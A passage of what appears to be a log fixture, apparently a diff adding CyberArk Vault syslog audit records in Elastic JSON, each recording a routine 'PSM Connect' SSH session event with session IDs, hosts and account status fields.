06:49:37","IsoTimestamp":"2021-03-14T13:49:37Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"300","Desc":"PSM Connect","Severity":"Info","Issuer":"Administrator","Action":"PSM Connect","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating 
System-UnixSSH-34.123.103.115-testark","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=d284c268-2ba0-4366-af52-e33459b073a1;SrcHost=81.32.170.205;User=testark;","Message":"PSM Connect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615729572"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<5>1 2021-03-14T13:50:43Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 06:50:43\n 2021-03-14T13:50:43Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 300\n PSM Connect\n Info\n Administrator\n PSM Connect\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 34.71.250.247\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=47747796-03e1-4a11-af39-ab56c00e7732;SrcHost=81.32.170.205;User=testark;\n PSM Connect\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 06:50:43","IsoTimestamp":"2021-03-14T13:50:43Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"300","Desc":"PSM Connect","Severity":"Info","Issuer":"Administrator","Action":"PSM Connect","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating 
System-UnixSSH-34.123.103.115-testark","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=47747796-03e1-4a11-af39-ab56c00e7732;SrcHost=81.32.170.205;User=testark;","Message":"PSM Connect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615729572"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<5>1 2021-03-15T10:31:56Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 03:31:56\n 2021-03-15T10:31:56Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 300\n PSM Connect\n Info\n Administrator\n PSM Connect\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 34.71.250.247\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=29f340df-89e9-405a-beae-0216390cda42;SrcHost=81.32.170.205;User=testark;\n PSM Connect\n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 03:31:56","IsoTimestamp":"2021-03-15T10:31:56Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"300","Desc":"PSM Connect","Severity":"Info","Issuer":"Administrator","Action":"PSM Connect","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating 
System-UnixSSH-34.123.103.115-testark","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=29f340df-89e9-405a-beae-0216390cda42;SrcHost=81.32.170.205;User=testark;","Message":"PSM Connect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CPMStatus","Value":"success"},{"Name":"RetriesCount","Value":"-1"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<5>1 2021-03-15T10:33:39Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 03:33:39\n 2021-03-15T10:33:39Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 300\n PSM Connect\n Info\n Administrator\n PSM Connect\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 34.71.250.247\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=f1654cf8-8ce5-472a-8205-ba731b0fab46;SrcHost=81.32.170.205;User=testark;\n PSM Connect\n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 03:33:39","IsoTimestamp":"2021-03-15T10:33:39Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"300","Desc":"PSM Connect","Severity":"Info","Issuer":"Administrator","Action":"PSM Connect","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating 
System-UnixSSH-34.123.103.115-testark","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=f1654cf8-8ce5-472a-8205-ba731b0fab46;SrcHost=81.32.170.205;User=testark;","Message":"PSM Connect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CPMStatus","Value":"success"},{"Name":"RetriesCount","Value":"-1"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<5>1 2021-03-15T10:35:00Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 03:35:00\n 2021-03-15T10:35:00Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 300\n PSM Connect\n Info\n Administrator\n PSM Connect\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 34.71.250.247\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=8b3d0b38-aef5-49d9-bdd7-d57706887d8b;SrcHost=81.32.170.205;User=testark;\n PSM Connect\n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 03:35:00","IsoTimestamp":"2021-03-15T10:35:00Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"300","Desc":"PSM Connect","Severity":"Info","Issuer":"Administrator","Action":"PSM Connect","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating 
System-UnixSSH-34.123.103.115-testark","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=8b3d0b38-aef5-49d9-bdd7-d57706887d8b;SrcHost=81.32.170.205;User=testark;","Message":"PSM Connect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CPMStatus","Value":"success"},{"Name":"RetriesCount","Value":"-1"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<5>1 2021-03-15T13:18:31Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 06:18:31\n 2021-03-15T13:18:31Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 300\n PSM Connect\n Info\n Administrator\n PSM Connect\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian\n 34.71.250.247\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=692fe25f-f940-4170-8ea4-5241b35173f0;SrcHost=81.32.170.205;User=adrian;\n PSM Connect\n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 06:18:31","IsoTimestamp":"2021-03-15T13:18:31Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"300","Desc":"PSM Connect","Severity":"Info","Issuer":"Administrator","Action":"PSM Connect","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating 
System-UnixSSHKeys-34.123.103.115-adrian","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=692fe25f-f940-4170-8ea4-5241b35173f0;SrcHost=81.32.170.205;User=adrian;","Message":"PSM Connect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<5>1 2021-03-15T14:08:06Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 07:08:06\n 2021-03-15T14:08:06Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 300\n PSM Connect\n Info\n Administrator\n PSM Connect\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian\n 34.71.250.247\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=f5725611-ca57-4a2a-a089-f45b3174a358;SrcHost=81.32.170.205;User=adrian;\n PSM Connect\n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 07:08:06","IsoTimestamp":"2021-03-15T14:08:06Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"300","Desc":"PSM Connect","Severity":"Info","Issuer":"Administrator","Action":"PSM Connect","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=f5725611-ca57-4a2a-a089-f45b3174a358;SrcHost=81.32.170.205;User=adrian;","Message":"PSM 
Connect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<5>1 2021-03-15T14:08:28Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 07:08:28\n 2021-03-15T14:08:28Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 300\n PSM Connect\n Info\n Administrator\n PSM Connect\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 34.71.250.247\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=7db90436-8a1a-4203-9a96-65137625ab2d;SrcHost=81.32.170.205;User=testark;\n PSM Connect\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 07:08:28","IsoTimestamp":"2021-03-15T14:08:28Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"300","Desc":"PSM Connect","Severity":"Info","Issuer":"Administrator","Action":"PSM Connect","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-34.123.103.115-testark","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=7db90436-8a1a-4203-9a96-65137625ab2d;SrcHost=81.32.170.205;User=testark;","Message":"PSM 
Connect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615814025"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"},{"Name":"UseSudoOnReconcile","Value":"Yes"}]}}}} -<5>1 2021-03-15T14:11:09Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 07:11:09\n 2021-03-15T14:11:09Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 300\n PSM Connect\n Info\n Administrator\n PSM Connect\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 34.71.250.247\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=27f74dce-f5d5-4c94-bf99-ca6aafe2c518;SrcHost=81.32.170.205;User=testark;\n PSM Connect\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 07:11:09","IsoTimestamp":"2021-03-15T14:11:09Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"300","Desc":"PSM Connect","Severity":"Info","Issuer":"Administrator","Action":"PSM Connect","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating 
System-UnixSSH-34.123.103.115-testark","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=27f74dce-f5d5-4c94-bf99-ca6aafe2c518;SrcHost=81.32.170.205;User=testark;","Message":"PSM Connect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615814025"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"},{"Name":"UseSudoOnReconcile","Value":"Yes"}]}}}} -<5>1 2021-03-16T10:04:51Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 16 03:04:51\n 2021-03-16T10:04:51Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 300\n PSM Connect\n Info\n Administrator\n PSM Connect\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 34.71.250.247\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=8b222ac9-c2ad-49ea-9c4e-6829940f58d4;SrcHost=81.32.170.205;User=testark;\n PSM Connect\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 16 03:04:51","IsoTimestamp":"2021-03-16T10:04:51Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"300","Desc":"PSM Connect","Severity":"Info","Issuer":"Administrator","Action":"PSM 
Connect","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-34.123.103.115-testark","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=8b222ac9-c2ad-49ea-9c4e-6829940f58d4;SrcHost=81.32.170.205;User=testark;","Message":"PSM Connect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"4"},{"Name":"LastFailDate","Value":"1615888216"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. 
code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"},{"Name":"UseSudoOnReconcile","Value":"Yes"}]}}}} +<5>1 2021-03-11T17:38:20Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:38:20\n 2021-03-11T17:38:20Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 300\n PSM Connect\n Info\n Administrator\n PSM Connect\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian\n 67.43.156.13\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=87012dcc-8290-11eb-949e-080027efd402;SrcHost=127.0.0.1;User=adrian;\n PSM Connect\n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:38:20","IsoTimestamp":"2021-03-11T17:38:20Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"300","Desc":"PSM Connect","Severity":"Info","Issuer":"Administrator","Action":"PSM Connect","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=87012dcc-8290-11eb-949e-080027efd402;SrcHost=127.0.0.1;User=adrian;","Message":"PSM Connect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<5>1 2021-03-11T17:46:56Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:46:56\n 2021-03-11T17:46:56Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 300\n PSM Connect\n Info\n Administrator\n PSM Connect\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian\n 67.43.156.13\n \n \n \n \n 
ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=ba22b012-8291-11eb-b981-080027efd402;SrcHost=127.0.0.1;User=adrian;\n PSM Connect\n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:46:56","IsoTimestamp":"2021-03-11T17:46:56Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"300","Desc":"PSM Connect","Severity":"Info","Issuer":"Administrator","Action":"PSM Connect","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=ba22b012-8291-11eb-b981-080027efd402;SrcHost=127.0.0.1;User=adrian;","Message":"PSM Connect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<5>1 2021-03-11T17:48:34Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:48:34\n 2021-03-11T17:48:34Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 300\n PSM Connect\n Info\n Administrator\n PSM Connect\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian\n 67.43.156.13\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=f6acbf00-8291-11eb-b9ba-080027efd402;SrcHost=10.0.2.2;User=adrian;\n PSM Connect\n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:48:34","IsoTimestamp":"2021-03-11T17:48:34Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"300","Desc":"PSM 
Connect","Severity":"Info","Issuer":"Administrator","Action":"PSM Connect","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=f6acbf00-8291-11eb-b9ba-080027efd402;SrcHost=10.0.2.2;User=adrian;","Message":"PSM Connect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<5>1 2021-03-11T17:54:56Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:54:56\n 2021-03-11T17:54:56Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 300\n PSM Connect\n Info\n Administrator\n PSM Connect\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian\n 67.43.156.13\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=d8ff4d32-8292-11eb-b962-080027efd402;SrcHost=10.0.2.2;User=adrian;\n PSM Connect\n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:54:56","IsoTimestamp":"2021-03-11T17:54:56Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"300","Desc":"PSM Connect","Severity":"Info","Issuer":"Administrator","Action":"PSM Connect","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=d8ff4d32-8292-11eb-b962-080027efd402;SrcHost=10.0.2.2;User=adrian;","Message":"PSM 
Connect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<5>1 2021-03-11T17:56:37Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:56:37\n 2021-03-11T17:56:37Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 300\n PSM Connect\n Info\n Administrator\n PSM Connect\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian\n 67.43.156.13\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=173dd46a-8293-11eb-afcb-080027efd402;SrcHost=10.0.2.2;User=adrian;\n PSM Connect\n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:56:37","IsoTimestamp":"2021-03-11T17:56:37Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"300","Desc":"PSM Connect","Severity":"Info","Issuer":"Administrator","Action":"PSM Connect","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=173dd46a-8293-11eb-afcb-080027efd402;SrcHost=10.0.2.2;User=adrian;","Message":"PSM Connect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<5>1 2021-03-11T20:23:25Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 12:23:25\n 2021-03-11T20:23:25Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 300\n PSM Connect\n Info\n Administrator\n PSM 
Connect\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian\n 67.43.156.13\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=988b22e8-82a7-11eb-83b9-080027efd402;SrcHost=10.0.2.2;User=adrian;\n PSM Connect\n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 12:23:25","IsoTimestamp":"2021-03-11T20:23:25Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"300","Desc":"PSM Connect","Severity":"Info","Issuer":"Administrator","Action":"PSM Connect","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=988b22e8-82a7-11eb-83b9-080027efd402;SrcHost=10.0.2.2;User=adrian;","Message":"PSM Connect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<5>1 2021-03-14T13:49:37Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 